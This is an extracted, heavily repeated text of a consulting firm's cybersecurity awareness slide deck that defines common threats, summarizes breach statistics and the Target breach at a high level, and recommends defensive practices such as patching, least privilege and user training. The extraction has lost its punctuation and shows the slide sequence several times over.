and virusesbull Stolen hardware such as laptops or mobile devicesbull Denial-of-service and distributed denial-of-service attacksbull Breach of accessbull Password sniffingbull System infiltrationbull Website defacementbull Private and public Web browser exploitsbull Instant messaging abusebull Intellectual property (IP) theft or unauthorized access
17
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
18
Information Technology (IT) ndash The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The Hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition systems(SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
19
Bot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware ndash Software that facilitates exchange of data between two application programs within the same
environment or across different hardware and network environments Three basic types of middleware are (1)
communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place
themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for
themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious
code into a website In SQL Injection the attacker uses SQL language to obtain information back from the
website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of
website
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or
means Darknet sites require special software such as TOR (The Onion Router) that helps keep users
anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or
Credit card data as well as Botnet rentals Bitcoins are traded on the Dark web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public
ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing
power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves
solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving
a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash
that is the amount of computing power involved ndash increases
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
hellipAND THESE
9
copyStinnett amp Associates LLC
hellipTHEY ALL HAVE AT LEAST TWO THINGS IN COMMON
10
ALL HAVE BEEN VICTIMS OF CYBER ATTACK amp BREACH
ALL HAD SOMETHING OF VALUE TO THE ATTACKER
copyStinnett amp Associates LLC11
LIST OF RECENT HEADLINES
copyStinnett amp Associates LLC
WHY DO WE CARE
12
Security compromises are a persistent business risk
bull US Department of Commerce estimates intellectual
property theft costs US companies $250 billion
annually
bull In 2015 38 more security incidents were
detected than in 2014
bull 70 of cyber attacks and data breaches go
undetected
bull 69 of organizations learn of their breach from an
outside entity such as law enforcement customers
or suppliers
bull Data breaches cost companies an average of $154
per compromised record
bull Cyberinsurance market will reach $75 billion in
annual sales by 2020 up from $25 billion in 2016
bull Cyber Crime costs estimated to reach $2 Trillion by
2019
bull 20 of small and mid-size businesses have been
cyber crime targets
Source PwC Global State of Information Security Survey 2016US Dept of Commerce Stolen Intellectual Property Harms American Businesses Says Acting Deputy Secretary Blank 2012IBM and Ponemon 2015 Cost of Data Breach Study Global Analysis
copyStinnett amp Associates LLC
FINANCIAL GAIN STILL 1 REASON
13
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2015
Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information
(PII) is worth more on the black
market (ldquoThe Dark Webrdquo) then Credit
Card Numbers
bull Ransomware payments estimated
over $1 billion in 2016
bull 70 of all Ransomware was paid
bull 20 paid over $20000
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
METHODS OF FINANCIAL GAIN
Cyber criminals have multiple means to achieve financial gain
14
bull Theft of funds (Bank Accounts)bull Extortion (Ransomware)bull Selling of stolen credit cardsbull Selling of PII databull Insider trading informationbull Using compromised environment for other
attacks or for rent
copyStinnett amp Associates LLC
THE TYPES OF CYBER ATTACKS AND EXPLOITS ARE CHANGING
15
bull Server Attacks once at 50 are
trending down
bull User Device and Person attacks are
both trending upward at nearly same
pace due to Malware Ransomware
and Phishing attacks
The types of exploits used are changing
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBERSECURITY DEFINED
The body of technologies processes and practices
designed to protect networks computers programs and
data from attack damage or unauthorized access
Cybersecurity is usually considered a sub-set of
Information Security but can require the consideration of
bull Application Security
bull Operating System and Network security
bull Usage of Specific Intrusion Detection and Prevention
Software and tools
bull User Training and Education
bull Disaster Recovery and Business Continuity Considerations
bull Really Anything to help prevent detect or recover from a
Cyberattack
16
copyStinnett amp Associates LLC
CYBER ATTACK DEFINED
The deliberate exploitation of computer systems technology-dependent enterprises and
networks Cyber attacks can use malicious code weak passwords or other cyber exploits to gain
unlawful access to systems and data often resulting in disruptive consequences that can
compromise data and lead to cybercrimes such as information and identity theft
Cyber attacks often include the followingbull Identity theft fraud extortionbull Malware pharming phishing spamming spoofing spyware Trojans
and virusesbull Stolen hardware such as laptops or mobile devicesbull Denial-of-service and distributed denial-of-service attacksbull Breach of accessbull Password sniffingbull System infiltrationbull Website defacementbull Private and public Web browser exploitsbull Instant messaging abusebull Intellectual property (IP) theft or unauthorized access
17
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
18
Information Technology (IT) ndash The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The Hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition systems(SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
19
Bot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware ndash Software that facilitates exchange of data between two application programs within the same
environment or across different hardware and network environments Three basic types of middleware are (1)
communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place
themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for
themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious
code into a website In SQL Injection the attacker uses SQL language to obtain information back from the
website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of
website
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or
means Darknet sites require special software such as TOR (The Onion Router) that helps keep users
anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or
Credit card data as well as Botnet rentals Bitcoins are traded on the Dark web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public
ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing
power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves
solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving
a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash
that is the amount of computing power involved ndash increases
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
hellipTHEY ALL HAVE AT LEAST TWO THINGS IN COMMON
10
ALL HAVE BEEN VICTIMS OF CYBER ATTACK amp BREACH
ALL HAD SOMETHING OF VALUE TO THE ATTACKER
copyStinnett amp Associates LLC11
LIST OF RECENT HEADLINES
copyStinnett amp Associates LLC
WHY DO WE CARE
12
Security compromises are a persistent business risk
bull US Department of Commerce estimates intellectual
property theft costs US companies $250 billion
annually
bull In 2015 38 more security incidents were
detected than in 2014
bull 70 of cyber attacks and data breaches go
undetected
bull 69 of organizations learn of their breach from an
outside entity such as law enforcement customers
or suppliers
bull Data breaches cost companies an average of $154
per compromised record
bull Cyberinsurance market will reach $75 billion in
annual sales by 2020 up from $25 billion in 2016
bull Cyber Crime costs estimated to reach $2 Trillion by
2019
bull 20 of small and mid-size businesses have been
cyber crime targets
Source PwC Global State of Information Security Survey 2016US Dept of Commerce Stolen Intellectual Property Harms American Businesses Says Acting Deputy Secretary Blank 2012IBM and Ponemon 2015 Cost of Data Breach Study Global Analysis
copyStinnett amp Associates LLC
FINANCIAL GAIN STILL 1 REASON
13
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2015
Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information
(PII) is worth more on the black
market (ldquoThe Dark Webrdquo) then Credit
Card Numbers
bull Ransomware payments estimated
over $1 billion in 2016
bull 70 of all Ransomware was paid
bull 20 paid over $20000
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
METHODS OF FINANCIAL GAIN
Cyber criminals have multiple means to achieve financial gain
14
bull Theft of funds (Bank Accounts)bull Extortion (Ransomware)bull Selling of stolen credit cardsbull Selling of PII databull Insider trading informationbull Using compromised environment for other
attacks or for rent
copyStinnett amp Associates LLC
THE TYPES OF CYBER ATTACKS AND EXPLOITS ARE CHANGING
15
bull Server Attacks once at 50 are
trending down
bull User Device and Person attacks are
both trending upward at nearly same
pace due to Malware Ransomware
and Phishing attacks
The types of exploits used are changing
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBERSECURITY DEFINED
The body of technologies processes and practices
designed to protect networks computers programs and
data from attack damage or unauthorized access
Cybersecurity is usually considered a sub-set of
Information Security but can require the consideration of
bull Application Security
bull Operating System and Network security
bull Usage of Specific Intrusion Detection and Prevention
Software and tools
bull User Training and Education
bull Disaster Recovery and Business Continuity Considerations
bull Really Anything to help prevent detect or recover from a
Cyberattack
16
copyStinnett amp Associates LLC
CYBER ATTACK DEFINED
The deliberate exploitation of computer systems technology-dependent enterprises and
networks Cyber attacks can use malicious code weak passwords or other cyber exploits to gain
unlawful access to systems and data often resulting in disruptive consequences that can
compromise data and lead to cybercrimes such as information and identity theft
Cyber attacks often include the followingbull Identity theft fraud extortionbull Malware pharming phishing spamming spoofing spyware Trojans
